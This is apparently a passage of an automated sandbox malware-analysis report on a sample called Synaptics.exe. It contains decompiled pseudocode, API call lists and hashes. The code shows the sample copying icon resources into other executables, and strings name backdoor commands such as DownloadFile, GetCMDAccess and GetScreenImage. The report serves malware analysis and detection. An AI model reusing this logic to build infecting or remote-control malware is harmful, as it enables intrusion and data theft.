                                                                                                                                                                                                                            					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                                                                                                                                                                            						goto L37;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                                                                                                                                                                            						_t58 = 0;
                                                                                                                                                                                                                            						if(_t44 != 1) {
                                                                                                                                                                                                                            							goto L37;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t46 = 0;
                                                                                                                                                                                                                            						while(_t46 < _t58) {
                                                                                                                                                                                                                            							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                                                                                                                                                                            								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t46 = _t46 + 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L30;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            0x00402eae
                                                                                                                                                                                                                            0x00402eb7
                                                                                                                                                                                                                            0x00402ec3
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ec5
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402eb9
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ecb
                                                                                                                                                                                                                            0x00402ed3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ed5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402de8
                                                                                                                                                                                                                            0x00402df8
                                                                                                                                                                                                                            0x00402e00
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00402f0e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f14
                                                                                                                                                                                                                            0x00402e06
                                                                                                                                                                                                                            0x00402e0e
                                                                                                                                                                                                                            0x00402ed7
                                                                                                                                                                                                                            0x00402edd
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ef6
                                                                                                                                                                                                                            0x00402ee1
                                                                                                                                                                                                                            0x00402ee8
                                                                                                                                                                                                                            0x00402efc
                                                                                                                                                                                                                            0x00402f01
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402f07
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00402eef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402eed
                                                                                                                                                                                                                            0x00402e14
                                                                                                                                                                                                                            0x00402e21
                                                                                                                                                                                                                            0x00402e22
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e28
                                                                                                                                                                                                                            0x00402e2d
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e2f
                                                                                                                                                                                                                            0x00402e3e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e44
                                                                                                                                                                                                                            0x00402e59
                                                                                                                                                                                                                            0x00402e5e
                                                                                                                                                                                                                            0x00402e60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e66
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e74
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e98
                                                                                                                                                                                                                            0x00402e88
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00402e76
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402e68
                                                                                                                                                                                                                            0x00402e3e

APIs
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
• GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
• GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
• GetLastError.KERNEL32(000000F5), ref: 00402F14

Memory Dump Source
• Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd

Yara matches

Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
• Opcode ID: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
• Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
• Opcode Fuzzy Hash: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
• Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D

Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00473930(CHAR* __eax, CHAR* __edx) {
                                                                                                                                                                                                                            				void _v40;
                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                            				long _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				CHAR* _v56;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				long _t60;
                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v56 = __edx;
                                                                                                                                                                                                                            				_v52 = 0;
                                                                                                                                                                                                                            				_t23 = CreateFileA(__eax, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                            				_t66 = _t23;
                                                                                                                                                                                                                            				if(_t66 > 0) {
                                                                                                                                                                                                                            					ReadFile(_t66,  &_v40, 0x16,  &_v48, 0); // executed
                                                                                                                                                                                                                            					SetFilePointer(_t66, 0, 0, 0); // executed
                                                                                                                                                                                                                            					_t65 = E0040275C(0x26);
                                                                                                                                                                                                                            					_t64 = E0040275C(0x22);
                                                                                                                                                                                                                            					_t59 = _t65;
                                                                                                                                                                                                                            					ReadFile(_t66, _t65, 0x26,  &_v48, 0); // executed
                                                                                                                                                                                                                            					E004029DC(_t59, 0x14, _t64);
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 + 6)) =  *((intOrPtr*)(_t65 + 6));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t64 + 0xa)) =  *((intOrPtr*)(_t65 + 0xa));
                                                                                                                                                                                                                            					 *(_t64 + 0xe) =  *(_t65 + 0xe);
                                                                                                                                                                                                                            					 *((short*)(_t64 + 0x12)) = 1;
                                                                                                                                                                                                                            					_t60 =  *(_t65 + 0xe);
                                                                                                                                                                                                                            					_v44 = E0040275C(_t60);
                                                                                                                                                                                                                            					SetFilePointer(_t66,  *(_t65 + 0x12), 0, 0); // executed
                                                                                                                                                                                                                            					ReadFile(_t66, _v44, _t60,  &_v48, 0);
                                                                                                                                                                                                                            					CloseHandle(_t66); // executed
                                                                                                                                                                                                                            					_t49 = BeginUpdateResourceA(_v56, "true"); // executed
                                                                                                                                                                                                                            					_t67 = _t49;
                                                                                                                                                                                                                            					if(_t67 > 0) {
                                                                                                                                                                                                                            						UpdateResourceA(_t67, 3, 1, 0, _v44, _t60);
                                                                                                                                                                                                                            						EndUpdateResourceA(_t67, 0); // executed
                                                                                                                                                                                                                            						_v52 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0040277C(_v44);
                                                                                                                                                                                                                            					E0040277C(_t64);
                                                                                                                                                                                                                            					E0040277C(_t65);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v52;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0049A0E3,00000000,0049A352), ref: 00473952
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000,00000000), ref: 00473970
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0047397C
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016,?,00000000,00000000,80000000), ref: 004739A6
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000016), ref: 004739E8
                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000,00000000), ref: 004739FB
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000026,?,00000000,00000000), ref: 00473A01
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00473A0D
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00473A25
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00473A2D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$ReadResourceUpdate$Pointer$BeginCloseCreateHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2954177348-0
                                                                                                                                                                                                                            • Opcode ID: 2590ce1a74d2837bb9c478fe0ddba3c46b053e8e32707a9ec078a65d7c66f3c1
                                                                                                                                                                                                                            • Instruction ID: bc58bece930a9ee3c191066ba21d3152ea947465ec18ce8fe9039474e398f891
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2590ce1a74d2837bb9c478fe0ddba3c46b053e8e32707a9ec078a65d7c66f3c1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A33147707443057EE210EB598C46F6BB7DC9F44704F00442EBA59EB2C2D6B9F904976E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID: CheckMe$DeleteFile$DownloadFile$GetCMDAccess$GetScreenImage$ListDir$ListDisk
                                                                                                                                                                                                                            • API String ID: 2422867632-2040281516
                                                                                                                                                                                                                            • Opcode ID: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                                                            • Instruction ID: cc4d067afddf7cdfb89c5fbb3b31213d9db14bacd25ac7606a572a3bc3506bde
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131CF30710A049BCF12EBA5DC46A1A7BB4EF89714B70867BF600D77A1CA3CAD09871C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                            			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				void* _t97;
                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = __fp0;
                                                                                                                                                                                                                            				_t124 = __esi;
                                                                                                                                                                                                                            				_t123 = __edi;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_t92 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x49a5ef);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t127;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                            					_pop(_t103);
                                                                                                                                                                                                                            					 *[fs:eax] = _t103;
                                                                                                                                                                                                                            					_push(E0049A5F6);
                                                                                                                                                                                                                            					return E004049E4( &_v20, 4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t27 =  *((intOrPtr*)(_t92 + 0x308));
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
                                                                                                                                                                                                                            				_t29 = E004738BC(0, _t92); // executed
                                                                                                                                                                                                                            				_t31 = E00441704(_t92);
                                                                                                                                                                                                                            				_t32 =  *0x49d6b8; // 0x4967bc
                                                                                                                                                                                                                            				_t97 = _t29;
                                                                                                                                                                                                                            				 *0x49f149 = E00477AD8(_t32, _t92, _t31, _t123, _t124);
                                                                                                                                                                                                                            				E00402B68(1,  &_v8);
                                                                                                                                                                                                                            				E00404DCC(_v8, "InjUpdate");
                                                                                                                                                                                                                            				if(0 != 0) {
                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                            					_t38 =  *0x49d6b4; // 0x4967a8, executed
                                                                                                                                                                                                                            					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
                                                                                                                                                                                                                            					if(_t39 != 0) {
                                                                                                                                                                                                                            						E0045A800();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00498684(_t92, _t92, _t123, _t124); // executed
                                                                                                                                                                                                                            						E00498F04(_t92, _t123, _t124); // executed
                                                                                                                                                                                                                            						if(E00498B40(_t92, _t92, _t123, _t124) == 0) {
                                                                                                                                                                                                                            							_t49 =  *0x49f1b0; // 0x21e335c
                                                                                                                                                                                                                            							_push(E00409780(_t49, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t51 =  *0x49f1b4; // 0x21e336c
                                                                                                                                                                                                                            							_push(E00409780(_t51, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t53 =  *0x49f1b8; // 0x21e337c
                                                                                                                                                                                                                            							_push(E00409780(_t53, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t55 =  *0x49f1bc; // 0x21e338c
                                                                                                                                                                                                                            							_push(E00409780(_t55, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t57 =  *0x49f1c0; // 0x21e339c
                                                                                                                                                                                                                            							_push(E00409780(_t57, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t59 =  *0x49f1a8; // 0x21e3338
                                                                                                                                                                                                                            							_push(E00409780(_t59, _t97, 1, __eflags));
                                                                                                                                                                                                                            							_t61 =  *0x49f1a4; // 0x21e3328
                                                                                                                                                                                                                            							_t62 = E00409780(_t61, _t97, 1, __eflags);
                                                                                                                                                                                                                            							_pop(_t98); // executed
                                                                                                                                                                                                                            							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137); // executed
                                                                                                                                                                                                                            							E00499FAC(_t92, 1);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00498998(_t92, _t92, 1, _t123, _t124);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t69 =  *0x49d6b4; // 0x4967a8
                                                                                                                                                                                                                            				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
                                                                                                                                                                                                                            				_t131 = _t124;
                                                                                                                                                                                                                            				if(_t124 == 0) {
                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            					CloseHandle(_t124);
                                                                                                                                                                                                                            					_t73 =  *0x49d6b4; // 0x4967a8
                                                                                                                                                                                                                            					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
                                                                                                                                                                                                                            					E004737B0( &_v12);
                                                                                                                                                                                                                            					_push( &_v12);
                                                                                                                                                                                                                            					E00402B68(0,  &_v20);
                                                                                                                                                                                                                            					E00409E18(_v20,  &_v16);
                                                                                                                                                                                                                            					_pop(_t83);
                                                                                                                                                                                                                            					E00404C88(_t83, _v16);
                                                                                                                                                                                                                            					_t86 = E00409A48(_v12, _t131);
                                                                                                                                                                                                                            					_t132 = _t86;
                                                                                                                                                                                                                            					if(_t86 != 0) {
                                                                                                                                                                                                                            						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t133 = _t124;
                                                                                                                                                                                                                            				} while (_t124 != 0);
                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                            			}






























                                                                                                                                                                                                                            0x0049a5dc
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a5ee
                                                                                                                                                                                                                            0x0049a40a
                                                                                                                                                                                                                            0x0049a416
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a426
                                                                                                                                                                                                                            0x0049a42c
                                                                                                                                                                                                                            0x0049a432
                                                                                                                                                                                                                            0x0049a435
                                                                                                                                                                                                                            0x0049a43e
                                                                                                                                                                                                                            0x0049a446
                                                                                                                                                                                                                            0x0049a44d
                                                                                                                                                                                                                            0x0049a452
                                                                                                                                                                                                                            0x0049a458
                                                                                                                                                                                                                            0x0049a465
                                                                                                                                                                                                                            0x0049a472
                                                                                                                                                                                                                            0x0049a477
                                                                                                                                                                                                                            0x0049a4fd
                                                                                                                                                                                                                            0x0049a4ff
                                                                                                                                                                                                                            0x0049a504
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a5ac
                                                                                                                                                                                                                            0x0049a511
                                                                                                                                                                                                                            0x0049a513
                                                                                                                                                                                                                            0x0049a51a
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x0049a538
                                                                                                                                                                                                                            0x0049a542
                                                                                                                                                                                                                            0x0049a545
                                                                                                                                                                                                                            0x0049a54f
                                                                                                                                                                                                                            0x0049a552
                                                                                                                                                                                                                            0x0049a55c
                                                                                                                                                                                                                            0x0049a55f
                                                                                                                                                                                                                            0x0049a569
                                                                                                                                                                                                                            0x0049a56c
                                                                                                                                                                                                                            0x0049a576
                                                                                                                                                                                                                            0x0049a579
                                                                                                                                                                                                                            0x0049a583
                                                                                                                                                                                                                            0x0049a586
                                                                                                                                                                                                                            0x0049a58b
                                                                                                                                                                                                                            0x0049a594
                                                                                                                                                                                                                            0x0049a595
                                                                                                                                                                                                                            0x0049a59e
                                                                                                                                                                                                                            0x0049a52a
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a52c
                                                                                                                                                                                                                            0x0049a528
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a50b
                                                                                                                                                                                                                            0x0049a47d
                                                                                                                                                                                                                            0x0049a494
                                                                                                                                                                                                                            0x0049a496
                                                                                                                                                                                                                            0x0049a498
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49a
                                                                                                                                                                                                                            0x0049a49b
                                                                                                                                                                                                                            0x0049a4a0
                                                                                                                                                                                                                            0x0049a4b7
                                                                                                                                                                                                                            0x0049a4bc
                                                                                                                                                                                                                            0x0049a4c4
                                                                                                                                                                                                                            0x0049a4ca
                                                                                                                                                                                                                            0x0049a4d5
                                                                                                                                                                                                                            0x0049a4dd
                                                                                                                                                                                                                            0x0049a4de
                                                                                                                                                                                                                            0x0049a4e6
                                                                                                                                                                                                                            0x0049a4eb
                                                                                                                                                                                                                            0x0049a4ed
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f4
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x0049a4f9
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                                                            • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                                                            • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                                                            • API String ID: 1942958553-1737343353
                                                                                                                                                                                                                            • Opcode ID: 1a9573ad0b493aa6f71594b65027ac5b08455cbac32612747bfd3d13cb684c94
                                                                                                                                                                                                                            • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a9573ad0b493aa6f71594b65027ac5b08455cbac32612747bfd3d13cb684c94
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E004590AC(void* __ecx, char __edx) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v261;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                            				struct HINSTANCE__** _t53;
                                                                                                                                                                                                                            				struct HICON__* _t55;
                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                            				struct HINSTANCE__** _t60;
                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                            				char* _t69;
                                                                                                                                                                                                                            				char* _t75;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				intOrPtr* _t88;
                                                                                                                                                                                                                            				intOrPtr* _t89;
                                                                                                                                                                                                                            				intOrPtr _t90;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            				char _t93;
                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                            				void* _t105;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t93 = __edx;
                                                                                                                                                                                                                            				_t91 = __ecx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t105 = _t105 + 0xfffffff0;
                                                                                                                                                                                                                            					_t39 = E00403F10(_t39, _t104);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 = _t93;
                                                                                                                                                                                                                            				_t90 = _t39;
                                                                                                                                                                                                                            				E00421B3C(_t91, 0);
                                                                                                                                                                                                                            				_t42 =  *0x49dabc; // 0x49b520
                                                                                                                                                                                                                            				if( *((short*)(_t42 + 2)) == 0) {
                                                                                                                                                                                                                            					_t89 =  *0x49dabc; // 0x49b520
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                                                                                                                                                                            					 *_t89 = 0x45a814;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t43 =  *0x49dc10; // 0x49b528
                                                                                                                                                                                                                            				if( *((short*)(_t43 + 2)) == 0) {
                                                                                                                                                                                                                            					_t88 =  *0x49dc10; // 0x49b528
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                                                                                                                                                                            					 *_t88 = E0045AA0C;
                                                                                                                                                                                                                            				}
